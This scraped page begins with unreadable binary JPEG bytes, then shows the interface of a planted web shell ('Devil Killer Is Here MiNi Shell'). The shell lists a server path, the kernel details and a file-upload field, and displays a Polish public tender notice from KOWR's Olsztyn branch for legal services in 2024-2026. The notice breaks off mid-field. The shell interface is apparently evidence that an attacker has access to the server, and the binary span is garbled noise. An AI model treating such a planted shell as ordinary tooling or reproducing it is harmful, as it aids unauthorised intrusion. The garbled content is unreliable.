JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231130/0052538301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa obsługa prawna Krajowego Ośrodka Wsparcia Rolnictwa Oddział Terenowy w Olsztynie w latach 2024-2026 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">KRAJOWY OŚRODEK WSPARCIA ROLNICTWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">ODDZIAŁ TERENOWY W OLSZTYNIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bartosza Głowackiego 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-448</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.olsztyn@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.kowr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa osoba prawna / Agencja wykonawcza </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarowanie nieruchomościami Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa obsługa prawna Krajowego Ośrodka Wsparcia Rolnictwa Oddział Terenowy w Olsztynie w latach 2024-2026 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-08dd898d-8f86-11ee-b55a-a22b2d7f700e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00525383</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00119680/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.43 Obsługa prawna w okresie 01.01.2024-31.12.2026</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale XVIII SWZ - https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowe informacje znajdują się w Rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XX SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OLS.WOP.260.22.2023.SB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia dla części Nr 1 obejmuje w szczególności:<br/>a)	udzielanie komórkom organizacyjnym Zamawiającego porad i opinii prawnych <br/>w zakresie stosowania ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy z dnia 11 kwietnia 2003 r. <br/>o kształtowaniu ustroju rolnego, ustawy z dnia 10 lutego 2017 r. o Krajowym Ośrodku Wsparcia Rolnictwa oraz przepisów wykonawczych do w/w ustaw, <br/>a także innych aktów prawnych związanych z obrotem nieruchomościami rolnymi Skarbu Państwa i działaniem Zamawiającego;<br/>b)	sprawdzanie pod względem formalno-prawnym i parafowanie projektów decyzji administracyjnych i postanowień wydawanych na podstawie ustawy z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego, ustawy z dnia 14 czerwca 1960 r. kodeks postępowania administracyjnego oraz innych ustaw;<br/>c)	interpretację obowiązujących przepisów prawnych dotyczących działalności Zamawiającego;<br/>d)	sprawdzanie pod względem formalno-prawnym i parafowanie treści umów dzierżawy, aneksów do w/w umów i porozumień z terenów powiatu: bartoszyckiego, kętrzyńskiego, węgorzewskiego, giżyckiego i mrągowskiego, projektów aktów notarialnych i procedur w sprawach dotyczących gospodarowania i rozliczania mienia Zasobu Własności Rolnej Skarbu Państwa <br/>z w/w terenów;<br/>e)	współdziałanie z komórką organizacyjną Zamawiającego wykonującą zadania <br/>z zakresu windykacji należności w sprawie dochodzenia należności <br/>w postępowaniu egzekucyjnym oraz poza nim, a także w zakresie rozkładania na raty i umarzania należności;<br/>f)	sporządzanie oraz uzgadnianie wniosków i pism w sprawach zleconych przez Zamawiającego dotyczących gospodarowania Zasobem Własności Rolnej Skarbu Państwa;<br/>g)	współudział w rozpatrywaniu skarg, roszczeń i interwencji;<br/>h)	współdziałanie z notariuszami w zakresie sporządzania aktów notarialnych <br/>w przypadku zaistnienia wątpliwości wymagających prawnego rozstrzygnięcia;<br/>i)	udział w formułowaniu treści wewnętrznych aktów normatywnych, opiniowanie projektów wewnętrznych aktów normatywnych, w tym opiniowanie pod względem formalno-prawnym projektów zarządzeń;<br/>j)	doradztwo prawne, w oparciu o aktualne przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz innych aktów prawnych związanych z dostępem do informacji publicznej;<br/>k)	inne czynności niezbędne do należytego i prawidłowego wykonania przedmiotu zamówienia.<br/>2. Przedmiot zamówienia został dodatkowo opisany w projektowanych postanowieniach umowy, które stanowią załącznik Nr 5 do SWZ oraz w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia dla części Nr 2 obejmuje w szczególności:<br/>a)	udzielanie komórkom organizacyjnym Zamawiającego porad i opinii prawnych w zakresie stosowania ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy z dnia 11 kwietnia 2003 r. <br/>o kształtowaniu ustroju rolnego, ustawy z dnia 10 lutego 2017 r. o Krajowym Ośrodku Wsparcia Rolnictwa oraz przepisów wykonawczych do w/w ustaw, <br/>a także innych aktów prawnych związanych z obrotem nieruchomościami rolnymi Skarbu Państwa i działaniem Zamawiającego;<br/>b)	interpretację obowiązujących przepisów prawnych dotyczących działalności Zamawiającego;<br/>c)	sprawdzanie pod względem formalno-prawnym i parafowanie treści umów dzierżawy, aneksów do w/w umów i porozumień z terenów powiatu: ostródzkiego, iławskiego, nowomiejskiego, działdowskiego i nidzickiego, projektów aktów notarialnych i procedur w sprawach dotyczących gospodarowania i rozliczania mienia Zasobu Własności Rolnej Skarbu Państwa <br/>z w/w terenów;<br/>d)	sprawdzanie pod względem formalno-prawnym i parafowanie treści umów dzierżawy jezior i wód stojących na obszarze województwa warmińsko-mazurskiego oraz aneksów do w/w umów dzierżawy i porozumień;<br/>e)	sprawdzanie pod względem formalno-prawnym i parafowanie umów <br/>o przyznanie bezzwrotnej pomocy finansowej oraz zmian do w/w umów; <br/>f)	współdziałanie z komórką organizacyjną Zamawiającego wykonującą zadania z zakresu windykacji należności w sprawie dochodzenia należności w postępowaniu egzekucyjnym oraz poza nim, a także w zakresie rozkładania na raty i umarzania należności;<br/>g)	sporządzanie oraz uzgadnianie wniosków i pism w sprawach zleconych przez Zamawiającego dotyczących gospodarowania Zasobem Własności Rolnej Skarbu Państwa;<br/>h)	współudział w rozpatrywaniu skarg, roszczeń i interwencji;<br/>i)	współdziałanie z notariuszami w zakresie sporządzania aktów notarialnych w przypadku zaistnienia wątpliwości wymagających prawnego rozstrzygnięcia;<br/>j)	udział w formułowaniu treści wewnętrznych aktów normatywnych, opiniowanie projektów wewnętrznych aktów normatywnych, w tym opiniowanie pod względem formalno-prawnym projektów zarządzeń; <br/>k)	doradztwo prawne, w oparciu o aktualne przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz innych aktów prawnych związanych z dostępem do informacji publicznej;<br/>l)	sprawdzanie pod względem formalno-prawnym i parafowanie projektów decyzji i postanowień wydawanych na podstawie ustawy z dnia 14 czerwca 1960 r. kodeks postępowania administracyjnego oraz innych ustaw;<br/>m)	inne czynności niezbędne do należytego i prawidłowego wykonania przedmiotu zamówienia.<br/>2. Przedmiot zamówienia został dodatkowo opisany w projektowanych postanowieniach umowy, które stanowią załącznik Nr 5 do SWZ oraz w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia dla części Nr 3 obejmuje w szczególności:<br/>a)	udzielanie komórkom organizacyjnym Zamawiającego porad i opinii prawnych w zakresie stosowania ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy z dnia 11 kwietnia 2003 r. <br/>o kształtowaniu ustroju rolnego, ustawy z dnia 10 lutego 2017 r. o Krajowym Ośrodku Wsparcia Rolnictwa oraz przepisów wykonawczych do w/w ustaw, <br/>a także innych aktów prawnych związanych z obrotem nieruchomościami rolnymi Skarbu Państwa i działaniem Zamawiającego;<br/>b)	interpretację obowiązujących przepisów prawnych dotyczących działalności Zamawiającego;<br/>c)	sprawdzanie pod względem formalno-prawnym i parafowanie treści umów dzierżawy, aneksów do w/w umów i porozumień z terenów powiatu braniewskiego, elbląskiego, gołdapskiego, oleckiego i ełckiego, projektów aktów notarialnych i procedur w sprawach dotyczących gospodarowania i rozliczania mienia Zasobu Własności Rolnej Skarbu Państwa z w/w terenów;<br/>d)	udzielanie pomocy prawnej w sprawach dotyczących rozpatrywanych przez KOWR roszczeń reprywatyzacyjnych (dotyczy nieruchomości Zasobu Własności Rolnej Skarbu Państwa);<br/>e)	współdziałanie z komórką organizacyjną Zamawiającego wykonującą zadania z zakresu windykacji należności w sprawie dochodzenia należności w postępowaniu egzekucyjnym oraz poza nim, a także w zakresie rozkładania na raty i umarzania należności;<br/>f)	sporządzanie oraz uzgadnianie wniosków i pism w sprawach zleconych przez Zamawiającego dotyczących gospodarowania Zasobem Własności Rolnej Skarbu Państwa;<br/>g)	współudział w rozpatrywaniu skarg, roszczeń i interwencji;<br/>h)	współdziałanie z notariuszami w zakresie sporządzania aktów notarialnych w przypadku zaistnienia wątpliwości wymagających prawnego rozstrzygnięcia;<br/>i)	udział w formułowaniu treści wewnętrznych aktów normatywnych, opiniowanie projektów wewnętrznych aktów normatywnych, w tym opiniowanie pod względem formalno-prawnym projektów zarządzeń;<br/>j)	sprawdzanie pod względem formalno-prawnym i parafowanie projektów decyzji i postanowień wydawanych na podstawie ustawy z dnia 14 czerwca 1960 r. kodeks postępowania administracyjnego oraz innych ustaw;<br/>k)	doradztwo prawne, w oparciu o aktualne przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz innych aktów prawnych związanych z dostępem do informacji publicznej;<br/>l)	inne czynności niezbędne do należytego i prawidłowego wykonania przedmiotu zamówienia.<br/>2. Przedmiot zamówienia został dodatkowo opisany w projektowanych postanowieniach umowy, które stanowią załącznik Nr 5 do SWZ oraz w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Szczegółowy opis przedmiotu zamówienia dla części Nr 4 obejmuje w szczególności:<br/>a)	udzielanie komórkom organizacyjnym Zamawiającego porad i opinii prawnych <br/>w zakresie stosowania ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa, ustawy z dnia 11 kwietnia 2003 r. <br/>o kształtowaniu ustroju rolnego, ustawy z dnia 10 lutego 2017 r. o Krajowym Ośrodku Wsparcia Rolnictwa oraz przepisów wykonawczych do w/w ustaw, <br/>a także innych aktów prawnych związanych z obrotem nieruchomościami rolnymi Skarbu Państwa i działaniem Zamawiającego;<br/>b)	interpretację obowiązujących przepisów prawnych dotyczących działalności Zamawiającego;<br/>c)	sprawdzanie pod względem formalno-prawnym i parafowanie treści umów dzierżawy, aneksów do w/w umów i porozumień z terenów powiatu: olsztyńskiego, lidzbarskiego, szczycieńskiego i piskiego, projektów aktów notarialnych i procedur w sprawach dotyczących gospodarowania i rozliczania mienia Zasobu Własności Rolnej Skarbu Państwa z w/w terenów;<br/>d)	współdziałanie z komórką organizacyjną Zamawiającego wykonującą zadania <br/>z zakresu windykacji należności w sprawie dochodzenia należności <br/>w postępowaniu egzekucyjnym oraz poza nim, a także w zakresie rozkładania na raty i umarzania należności;<br/>e)	sporządzanie oraz uzgadnianie wniosków i pism w sprawach zleconych przez Zamawiającego dotyczących gospodarowania Zasobem Własności Rolnej Skarbu Państwa;<br/>f)	współudział w rozpatrywaniu skarg, roszczeń i interwencji;<br/>g)	współdziałanie z notariuszami w zakresie sporządzania aktów notarialnych <br/>w przypadku zaistnienia wątpliwości wymagających prawnego rozstrzygnięcia;<br/>h)	udział w formułowaniu treści wewnętrznych aktów normatywnych, opiniowanie projektów wewnętrznych aktów normatywnych, w tym opiniowanie pod względem formalno-prawnym projektów zarządzeń;<br/>i)	doradztwo prawne, w oparciu o aktualne przepisy ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej, ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz innych aktów prawnych związanych z dostępem do informacji publicznej;<br/>j)	doradztwo prawne w oparciu o aktualne przepisy ustawy z dnia 17 maja 1989 r. o stosunku Państwa do Kościoła Katolickiego w Rzeczypospolitej Polskiej <br/>w zakresie przekazywania nieruchomości rolnych wchodzących w skład Zasobu Własności Rolnej Skarbu Państwa na rzecz osób prawnych Kościoła Katolickiego, które po dniu 8 maja 1945 r. podjęły działalność na Ziemiach Zachodnich <br/>i Północnych;<br/>k)	doradztwo prawne w oparciu o aktualne przepisy ustawy z dnia 19 października 1991 r. o gospodarowaniu nieruchomościami rolnymi Skarbu Państwa w zakresie ustanawiania trwałego zarządu oraz w sprawach związanych z użytkowaniem wieczystym;<br/>l)	sprawdzanie pod względem formalno-prawnym i parafowanie projektów decyzji i postanowień wydawanych na podstawie ustawy z dnia 14 czerwca 1960 r. kodeks postępowania administracyjnego oraz innych ustaw;<br/>m)	inne czynności niezbędne do należytego i prawidłowego wykonania przedmiotu zamówienia.<br/>2. Przedmiot zamówienia został dodatkowo opisany w projektowanych postanowieniach umowy, które stanowią załącznik Nr 5 do SWZ oraz w rozdziale III SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79111000-5 - Usługi w zakresie doradztwa prawnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) 